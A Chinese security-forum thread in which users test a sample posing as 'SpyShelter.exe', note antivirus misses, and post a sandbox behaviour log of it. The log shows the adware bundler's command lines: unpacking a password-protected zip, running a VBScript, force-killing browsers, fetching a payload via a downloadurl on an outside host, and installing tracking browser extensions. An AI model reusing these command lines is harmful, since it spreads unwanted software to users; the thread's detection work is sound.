SpyShelter.exe

白露为霜

liu浪的人

Avira miss
云判白
懒得上报了，一般云是白的话，红伞肯定是判白的。。。

心痛的伤不起

liu浪的人 发表于 2015-12-22 23:34
Avira miss
云判白
懒得上报了，一般云是白的话，红伞肯定是判白的。。。

不如wd系列

kxmp

2015/12/23 14:29:30,E:\SpyShelter.exe,50,Allowed ;使用 DNS 解析服务访问网络
2015/12/23 14:29:30,C:\Program Files\Sandboxie\SandboxieDcomLaunch.exe,53,Allowed ;执行应用程序 (C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683})
2015/12/23 14:29:34,E:\SpyShelter.exe,48,Allowed ;出站网络访问
2015/12/23 14:29:42,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (7za.exe x -ppassword -y 316314.zip)
2015/12/23 14:29:42,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003C0D1B)
2015/12/23 14:29:42,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "478088254-1312189794-19950829741927673497459604238141156577236866780-728178424")
2015/12/23 14:29:42,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=6000))
2015/12/23 14:29:55,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 (C:\PROGRA~2\McAfee\COMMON~1\McScanCheck.exe "C:\ProgramData\McAfee\Common Framework\UpdateDir" "C:\ProgramData\McAfee\Common Framework\UpdateDir\x64" mscan64a.dll AVV "C:\Windows\TEMP\ScanCheck.txt")
2015/12/23 14:29:55,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "-1651228072503049511956901589-827314883-1592666892-1942204641580109960-1272265202")
2015/12/23 14:30:04,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ("C:\Program Files (x86)\Common Files\McAfee\DATReputation\mcdatrep.exe" /timeout=60000 /script=mcnrdhck.lua /hcmode=postdatupdate /datver=8023.0000 /datupdatestatus=0 )
2015/12/23 14:30:04,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ("C:\Program Files (x86)\Common Files\McAfee\DATReputation\mcdatrep.exe" /periodicRunCount=0 /script=mcnrdhck.lua )
2015/12/23 14:30:05,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ( /FI "IMAGENAME eq explorer.exe" /FO CSV /NH)
2015/12/23 14:30:08,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (C:\Windows\system32\CScript.exe "d:\temp\316314\hi.vbs" //e:vbscript //NOLOGO)
2015/12/23 14:30:08,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003C7252)
2015/12/23 14:30:08,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "338143596575308313692873832-20016725961288836711-1509871889-9265704791250334948")
2015/12/23 14:30:08,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=5444))
2015/12/23 14:30:11,C:\Windows\SysWOW64\cscript.exe,26,Allowed ;修改受保护的注册表键 (HKCU\Machine\Software\Classes\CLSID)
2015/12/23 14:30:11,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ( /FI "IMAGENAME eq explorer.exe" /FO CSV /NH)
2015/12/23 14:30:17,C:\Program Files (x86)\McAfee\Common Framework\McScript_InUse.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Common Files\McAfee\SystemCore\EntVUtil.EXE" "C:\Program Files\Common Files\McAfee\SystemCore\vscan.bof" )
2015/12/23 14:30:21,E:\SpyShelter.exe,53,Allowed ;执行应用程序 (d:\temp\201979.exe -ui=0 -sid=GuppyGo -merchantcid=236709 -forcefire=0  -tid="{DA8CF80D-AAD4-419A-A7CE-7AAFEB80363F}" -skipifinstalled=0 -disablepost=1 -disableuninstallinfo=1 -cid="316314" -affid="192346" -sid="shZnpJNKtGfhB7kPxQm99CS0_vWc7mMVEwTlUWGdEsSzOh1)
2015/12/23 14:30:26,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\201979.exe,53,Allowed ;执行应用程序 ("d:\temp\is-MAQOO.tmp\201979.tmp" /SL5="$1C1286,263420,119296,D:\temp\201979.exe" -ui=0 -sid=GuppyGo -merchantcid=236709 -forcefire=0  -tid="{DA8CF80D-AAD4-419A-A7CE-7AAFEB80363F}" -skipifinstalled=0 -disablepost=1 -disableuninstallinfo=1 -cid="316314" -affid)
2015/12/23 14:30:29,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,26,Allowed ;修改受保护的注册表键 (HKCU\Machine\Software\Classes\CLSID)
2015/12/23 14:30:33,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("C:\Windows\System32\taskkill.exe" /f /im chrome.exe)
2015/12/23 14:30:34,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003CD807)
2015/12/23 14:30:34,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "444042443-1959583709-1379484316665692931065482523-1731961981865629460-1227741386")
2015/12/23 14:30:34,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=5408))
2015/12/23 14:30:34,C:\Windows\SysWOW64\taskkill.exe,26,Allowed ;修改受保护的注册表键 (HKCU\Machine\Software\Classes\CLSID)
2015/12/23 14:30:40,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("C:\Windows\System32\taskkill.exe" /f /im firefox.exe)
2015/12/23 14:30:40,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003CF1ED)
2015/12/23 14:30:40,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "-642239881677714680166125766946256904-288141842309934449780999977-218563253")
2015/12/23 14:30:40,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=2504))
2015/12/23 14:30:43,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("C:\Windows\System32\taskkill.exe" /f /im iexplore.exe)
2015/12/23 14:30:43,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003CFD81)
2015/12/23 14:30:43,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "1937658548-9847657581609600950-1377082578-6912319161335222925-306770007389317131")
2015/12/23 14:30:43,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=5304))
2015/12/23 14:30:47,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-MAQOO.tmp\201979.tmp,53,Allowed ;执行应用程序 ("d:\temp\is-V7RHA.tmp\c10w.exe" -cid=316314 -affid=192346 -sid=GuppyGo -disablepost=1 -forcefire=0 -skipifinstalled=0 -delay=0 -ref=20202(c) -merchantcid=236709 -pubcid= -componentid=201979 -exename="compete.exe" -downloadurl="http://s.fastk.us/ConsumerInputS)
2015/12/23 14:30:47,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003D0C60)
2015/12/23 14:30:47,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "-17159567811003494079-13687363811099869392-251108506-1032153075693381816-1950632299")
2015/12/23 14:30:47,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=844))
2015/12/23 14:30:49,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,53,Allowed ;执行应用程序 (C:\Windows\system32\CScript.exe d:\temp\hi.vbs //e:vbscript //NOLOGO)
2015/12/23 14:30:49,C:\Program Files\Sandboxie\SbieSvc.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SbieSvc.exe" Sandboxie_GuiProxy_Console,Sandboxie_ConsoleReadyEvent_003D149A)
2015/12/23 14:30:49,C:\Windows\System32\csrss.exe,53,Allowed ;执行应用程序 (\??\C:\Windows\system32\conhost.exe "8454142111894301452600982658940222046-14869701052040354115-107766463177772538")
2015/12/23 14:30:49,C:\Windows\System32\conhost.exe,52,Allowed ;修改属于其它进程的窗口的属性 (SbieSvc.exe(pid=5772))
2015/12/23 14:30:52,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,50,Allowed ;使用 DNS 解析服务访问网络
2015/12/23 14:30:54,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,48,Allowed ;出站网络访问
2015/12/23 14:31:06,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\is-V7RHA.tmp\c10w.exe,53,Allowed ;执行应用程序 (d:\temp\compete.exe /partnerUrl="http://a.gmtrack.com/pixel.track?CID=261507&AFID=192346&SID=GuppyGo&source=316314&MerchantReferenceID={DA8CF80D-AAD4-419A-A7CE-7AAFEB80363F}&single_version=121815105004&cpp_version=121815103844" /panelid=gladiolus000 /panelist)
2015/12/23 14:31:08,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,50,Allowed ;使用 DNS 解析服务访问网络
2015/12/23 14:31:08,C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsTskMgr.exe,53,Allowed ;执行应用程序 ("C:\Program Files (x86)\McAfee\VirusScan Enterprise\x64\scan64.exe" /getengineversion64)
2015/12/23 14:31:09,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,48,Allowed ;出站网络访问
2015/12/23 14:31:10,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,53,Allowed ;执行应用程序 ("C:\Program Files\Sandboxie\SandboxieCrypto.exe")
2015/12/23 14:31:15,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,53,Allowed ;执行应用程序 ("d:\temp\nsu78CD.tmp")
2015/12/23 14:31:16,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\compete.exe,53,Allowed ;执行应用程序 ("d:\temp\nsk7C86.tmp" /install "bundlename=Consumer Input&appguid={C7B061F6-380E-4545-86E3-400E3156FD28}&appname=Consumer Input Firefox Extension&needsadmin=True&lang=en&appguid={1138A907-2253-45D6-99C1-843A0AC58730}&appname=Consumer Input Internet Explorer E)
2015/12/23 14:31:16,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\nsk7C86.tmp,53,Allowed ;执行应用程序 (d:\temp\GUM7D99.tmp\ConsumerInputUpdate.exe /install "bundlename=Consumer Input&appguid={C7B061F6-380E-4545-86E3-400E3156FD28}&appname=Consumer Input Firefox Extension&needsadmin=True&lang=en&appguid={1138A907-2253-45D6-99C1-843A0AC58730}&appname=Consumer Inp)
2015/12/23 14:31:19,C:\Sandbox\KxMP\DefaultBox\drive\D\temp\GUM7D99.tmp\ConsumerInputUpdate.exe,57,Allowed ;正在以只读方式打开受保护的进程 (explorer.exe(pid=1812))